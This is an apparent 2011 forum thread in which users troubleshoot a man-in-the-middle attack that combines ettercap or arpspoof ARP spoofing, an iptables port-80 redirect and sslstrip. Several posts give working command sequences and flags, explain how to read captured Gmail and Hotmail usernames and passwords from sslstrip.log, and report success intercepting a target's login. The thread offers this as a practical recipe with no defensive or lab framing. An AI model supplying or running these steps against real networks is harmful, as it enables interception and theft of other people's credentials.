
Thread: Ettercap+Sslstrip

  1. #1
    Just burned his ISO
    Join Date
    May 2011
    Posts
    5

    Default Ettercap+Sslstrip

    I have a problem using Ettercap and Sslstrip. If I uncomment iptables on etter.conf, ettercap takes over ssl, and the browser gives certificate errors. If I keep ignoring the errors, I eventually get logged in. If I keep the iptables commented on etter.conf, sslstrip seems to take over ssl connections and catches the login info. However, the browser gets redirected back to login page. Basically, I can't log in. Looking at the log, everything is forwarded and spoofed correctly. How can I fix this?

  2. #2
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Ettercap+Sslstrip

    Would you please post the instructions you are typing? That would give the members a better perception of your problem..
    In my case, so far, I have not had any success at all in using ettercap, ettercap + sslstrip or sslstrip alone...At all...

  3. #3
    Member
    Join Date
    Sep 2010
    Location
    Eastern Island
    Posts
    96

    Default Re: Ettercap+Sslstrip

    that is a bug

  4. #4
    Just burned his ISO
    Join Date
    May 2011
    Posts
    5

    Default Re: Ettercap+Sslstrip

    Here are my commands.

    sudo -i
    echo 1 > /proc/sys/net/ipv4/ip_forward
    exit
    sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sudo sslstrip -a -k -f
    sudo ettercap -Tqd -i eth1 -M arp:remote /192.168.1.200/ /192.168.1.1/

    or

    sudo arpspoof -i eth1 -t 192.168.1.200 192.168.1.1
    sudo arpspoof -i eth1 -t 192.168.1.200 192.168.1.1
    sudo ettercap -Tqd -i eth1

    This is a bug? I'm not the only one experiencing this?

  5. #5
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Ettercap+Sslstrip

    At last I was able to make it work: sslstrip and ettercap + sslstrip..
    You would have to read the man ettercap...Here is where I began...I had seen many videos regarding that matter, but never got it to work until yesterday..
    As for ettercap, I want to post this:
    ettercap -Tqi ethX: Whether or not you have uncommented the iptables section, you are just
    forwarding and listening in ethX or whatever your interface is.
    This is stated in the "man ettercap". So you do not need to use
    the echo 1 > /proc/sys/net/......./ip_forward.
    ettercap -Tqi ethX -u : You are just listening but not forwarding due to the -u
    parameter (--unoffensive)..In this case, you have to
    forward manually (echo 1 > /proc/sys/.../ip_forward)
    Do you want to test this?..Open a Terminal and run echo 1 > /proc/sys/net/......./ip_forward...Then type cat /proc/sys/net/ipv4/ip_forward and you should get a "1"
    meaning you are forwarding. In another Terminal type: ettercap -Tqi ethX -u, here
    you are only listening in ethX but NOT forwarding, get back to the first terminal where you typed the echo 1 > /proc/sys.../ip_forward and check the forwarding, by typing again cat /proc/sys../ip_forward..You will get a "1"...
    But if you type: ettercap -Tqi ethX, back to the second terminal and check again the cat command to see if you have a "1", you will see that the forwarding from kernel is now "0", NOT forwarding, because now ettercap is doing that..
    So, if you want to arpspoof, you can do it 2 ways:
    ettercap -Tqi ethX -M arp /target/ /GW/..You are doing 2 things here:
    1. Forwarding
    2. ARP spoofing..
    If you type:
    ettercap -Tqi ethX -u -M arp /target/ /GW/, you will get an error saying that you cannot use a MITM attack with an "unoffensive" -u..So, if you use the first attack, you do 2 things as mentioned...So now in another terminal you use the iptables and then run the sslstrip..(sslstrip -p -f), the default port is 10000...
    This way, using the sslstrip as ssl dissector, you won't get the "certificate" error...
    This is the way I made it work for me...
    If you want to use the ettercap only to listen, just make it run without forwarding using the -u parameter..But then, you would have to forward it manually with the echo 1 command..Then arpspoof in both ways with arpspoof and then use the iptables and sslstrip...
    If you want to use the ettercap and dissect ssl with sslstrip, just forward and arpspoof with it:
    ettercap -Tqi ethX -M arp /target/ /GW/ (in one terminal)
    iptables and sslstrip -p -f (-p to log only ssl traffic)

    If you want to use ettercap as listener and sslstrip:
    1. forward manually with echo 1
    2. arpspoof both ways with arpspoof -i ethx -t ...
    3. start ettercap as listener and grab traffic in a file:
    ettercap -Tqi ethX -u -l my_ssl_data
    4. Start iptables and run sslstrip -p -f
    5. If you run ettercap in this way, open another terminal and re-check the forwarding you did manually with: cat /proc/sys.../ip_forward..and you will see that it is "1", because ettercap is running with -u, without forwarding..

    All this, guys, is in the ettercap man..Just read it...

    Just check the sslstrip.log and you will see a lot of info, but the user and password are there:
    gmail: Email=xxxx@gmail.com&passwd=xxxxx
    hotmail: user=xxxx@hotmail.com&passwd=xxxx
    The info in ettercap files with -l parameter, should be my_data_ssl.eci, open it with etterlog...You should install the etterlog (aptitude install etterlog)

    Hope this helps you..It did work for me after 4 months of watching videos and reading posts..

    Good luck..

    I'm using karmic with ettercap, sslstrip (0.6, 0.7, 0.9), dell laptop single core and also a generic white box dual core as desktop....

    If you want to use only ettercap:
    1. you

  6. #6
    Just burned his ISO
    Join Date
    May 2011
    Posts
    5

    Default Re: Ettercap+Sslstrip

    Thanks! It solved certificate errors!
    Still, if I try to log into Gmail, it keeps redirecting me back to the log in page. I can see the captured user and password on ettercap. This is what I did.
    sudo ettercap -Tqdi ethX -M arp:remote /target/ /router/
    sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sudo sslstrip -a -k -f

    When I open gmail, I don't see the certificate error anymore even with iptables uncommented on etter.conf. Yea! I can't log in though.
    Of course I skipped "echo 1 > /proc/sys/net/ipv4/ip_forward" as you suggested.
    I assume sslstrip only works on http? I still get certificate on imap and pop3. I just don't get on https.
    Thanks for all your help!

  7. #7
    Junior Member
    Join Date
    Mar 2007
    Posts
    28

    Default Re: Ettercap+Sslstrip

    has anyone else tried maverik35's soln?

  8. #8
    Just burned his ISO
    Join Date
    Apr 2011
    Location
    Tunisia
    Posts
    3

    Default Re : Re: Ettercap+Sslstrip

    Why can't ettercap sniff http traffic? It works properly in the backtrack 4 release

  9. #9
    Junior Member
    Join Date
    Mar 2007
    Posts
    28

    Default Re: Ettercap+Sslstrip

    I still can't get sslstrip to actually "strip ssl" (yea, I know that's not what it's actually doing) even if I adjust my nat table for redirecting destination port to include 443. I am also once in a while getting the same error as this gent:
    http://www.backtrack-linux.org/forum...-ettercap.html

    but no one seems to have figured it out either

    EDIT: To anyone who is stuck like I was. Finally got mine working. The trick was sudo'ing sslstrip as well as ettercap, and listening on the default port (no -l option). Ended up using ms282's routine, except at the end: sudo sslstrip -fk
    Hope that helps someone.
    Last edited by charlietaco; 05-30-2011 at 11:44 AM. Reason: didn't read all of the posts above. removed dup stuff now.

  10. #10
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Ettercap+Sslstrip

    Quote: Originally posted by ms282
    Thanks! It solved certificate errors!
    Still, if I try to log into Gmail, it keeps redirecting me back to the log in page. I can see the captured user and password on ettercap. This is what I did.
    sudo ettercap -Tqdi ethX -M arp:remote /target/ /router/
    sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sudo sslstrip -a -k -f

    When I open gmail, I don't see the certificate error anymore even with iptables uncommented on etter.conf. Yea! I can't log in though.
    Of course I skipped "echo 1 > /proc/sys/net/ipv4/ip_forward" as you suggested.
    I assume sslstrip only works on http? I still get certificate on imap and pop3. I just don't get on https.
    Thanks for all your help!

    Great it worked for you..As far as sslstrip is concerned, it should work.
    You can try this: iptables -t nat --flush (flush the iptables, it flushes all appended chains to tables, in this case -A PREROUTING -p tcp --destination-port 80).
    Then re-type or re-enter the chain to the Table: iptables -t nat -A PREROUTING.......--to-port 10000
    sslstrip -p -f (I suggest to log only ssl posts which is the default)..Remember that the default port to listen for sslstrip is 10000, so no need to use the -l 10000.
    the log file will be left on the desktop if you are using BT, if you are using Ubuntu it will be left in the /home/root/ directory, in both cases as sslstrip.log unless you use the -w option and give a path and name to save the file.
    If you want to see the file "live" as it runs, open another terminal and type:
    tail -f my_ssldata.log this way you will see every http or https traffic as you navigate thru, of course depending on the ssl parameters you use (-p, -a)...I used both and the amount of info with -a is too much, unless you want to make a more deep study of traffic, use the -p option (default)..The -f is to show the little favicon showing that is a "secure page"..
    then re-run ettercap...Try it.....
    Best of luck...
